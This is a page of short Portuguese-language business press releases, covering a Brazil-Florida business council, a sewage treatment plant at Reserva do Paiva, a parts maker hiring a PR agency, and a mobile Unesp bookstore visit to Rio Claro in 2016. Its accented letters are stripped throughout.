“Chieko uma lder em contnua evoluo. Um exemplo a serseguido para quembuscainovaoem todos os campos em que atua,” afirma Oscar Motomura, Fundador e CEO do Grupo Amana-Key que conhece Chiekoh dcadas. Conclui que “com o seu dinamismo e extensa rede de relacionamentos, Chieko est e estar contribuindo para alavancaras relaes entre Brasil eFlrida, este progressivo estado americano.”

CONEXO

O Brazil-Florida Business Council foi criado em 2014 pela empresria Sueli Bonaparte. Baseado em Tampa, no oeste da Flrida, o BFBC tem o objetivo de dinamizar o comrcio e as relaes empresariais entre o Brasil e seu principal parceiro nos EUA, a Flrida, e ajudar empresas e investidores das duas regies a identificar oportunidades de negcios promissoras.

Para participar ou obter informaes do evento, contateinfo@brazilfloridabusiness.com

Imprimir o Post No Comments Share

Os efluentes so utilizados para irrigar os campos de golfe do primeiro bairro planejado do litoral pernambucano ou podem ser lanados no rio Pirapama

Fornecida e instalada pela Ecosan,a Estao de Tratamento de Esgoto (ETE) da Reserva do Paiva, o primeiro bairro planejado de Pernambuco, estrategicamente localizado entre o Recife e o complexo de Suape possui uma rea de 526 hectares, sobre uma faixa de 8,5 quilmetros de praias e cercado pela Mata Atlntica. Idealizada pela Oderbrecht Realizaes Imobilirias, em parceria com os Grupos Cornlio Brennand e Ricardo Brennand, a Reserva do Paiva composta de condomnios residenciais, condomnios empresariais, escolas, hotis e demais infraestrutura.

A ETE, construda pela Flamac Incorporao e Construo, composta por tratamento primrio dos efluentes e um sistema de lodos ativados por aerao prolongada, com desidratao mecnica dos lodos gerados e desinfeco por radiao ultravioleta. Seus efluentes podem ser lanados no rio Pirapama ou ser reutilizados para a irrigao dos campos de golfe. Seu diferencial que a unidade foi dimensionada de forma modular, sendo possvel sua implantao em quatro etapas, de forma a melhor acompanhar a curva de crescimento populacional prevista, minimizando a necessidade de investimentos no curto prazo. A vazo mdia da estao de 152 litros por segundo e a vazo mxima, de 229,06 l/s.

O tipo de tratamento adotado minimiza o risco de gerao de odores indesejveis, j que utiliza o processo aerbio em todas as fases de tratamento previstas, inclusive para a digesto de lodo. Trata-se de um processo ideal para as caractersticas do empreendimento de Reserva do Paiva, onde se deseja uma soluo de tratamento que gere o mnimo de impacto possvel na rea em que foi implantada, permitindo ainda uma grande simplicidade na sua operao e segurana quanto qualidade de efluente desejada, afirma Andr Telles, diretor executivo da Ecosan.

Imprimir o Post No Comments Share

Com o principal objetivo de ampliar a sua participao e transparncia no mercado brasileiro, a Tuzzi, tradicional empresa consolidada no Brasil com foco no desenvolvimento global de solues para diferentes mercados, em especial, o agrcola, alm do automotivo e industrial, acaba de contratar os servios da Vervi Assessoria e Comunicaes, empresa que h 35 anos atua na rea de comunicao corporativa, com nfase em assessoria de imprensa.

De acordo com Alexandre Tuzzi, diretor industrial da empresa, a Tuzzi conta com unidades de negcios que desenvolvem e produzem peas e componentes para tratores de rodas e veculos pesados, laminados de ao e forjados a quente para diversas aplicaes, atuando desde o estudo, projeto at a produo das peas.

Mais informaes pelo sitewww.tuzzi.com.br

Imprimir o Post No Comments Share

O caminho marca presena, de 7 a 11 de novembro de 2016, na XVII Semana Nacional do Livro e da Biblioteca no Instituto de Biocincias do cmpus de Rio Claro da Unesp

Depois de visitar o municpio de So Sebastio do Paraso, em Minas Gerais, a Livraria Unesp Mvel retorna ao estado de So Paulo e participa daXVIISemana Nacional do Livro e da Biblioteca no cmpus de Rio Claroda Unesp. A loja estaciona em frente a Biblioteca do Instituto de Biocincias, de 7 a 11 de novembro, e oferece descontos de 30% nos livros da Editora Unesp, 10% nos das demais editoras e mais 5% aos participantes do VII Encontro de Atividade Fsica e Sade: “Debatendo prticas corporais e alternativas na sade”, que acontece nos dias 9 e 10 de novembro.

So cerca de 6 mil volumes de gneros variados, que incluem, alm de livros acadmicos, paradidticos, infantojuvenis,best-sellers e autoajuda. O valor das compras pode ser parcelado (todas as bandeiras de carto de crdito so aceitas). A loja tambm aceita o Vale Cultura e o carto Clube Unesp.

Montada sobre um caminho-ba e com rea til de 20 metros quadrados, a Livraria Unesp Mvel foi concebida para circular por todo o pas, levando livros a cidades carentes de livrarias e bibliotecas. Em alguns municpios a loja tem se transformado em evento cultural. Nas cidades grandes e tursticas, j integra o calendrio oficial.

Livraria Unesp Mvel em Rio Claro
Data: 7 a 11 de novembro de 2016
Horrio: das 10h s 20h
Local: Em frente a biblioteca do Instituto de Biocincias da Unesp
Endereo: Avenida 24 A, 1515, Bela Vista – Rio Claro (SP)
Descontos: 30% nos livros da Editora Unesp, 10% nos das demais editoras e mais 5% aos participantes do VII Encontro de Atividade Fsica e Sade: “Debatendo prticas corporais e alternativas na sade”

Mais informaes sobre os livros da Editora Unesp esto disponveis no site: www.editoraunesp.com.br
Contato com a Livraria Unesp Mvel – Email: livrariamovel@editora.unesp.br

Imprimir o Post No Comments Share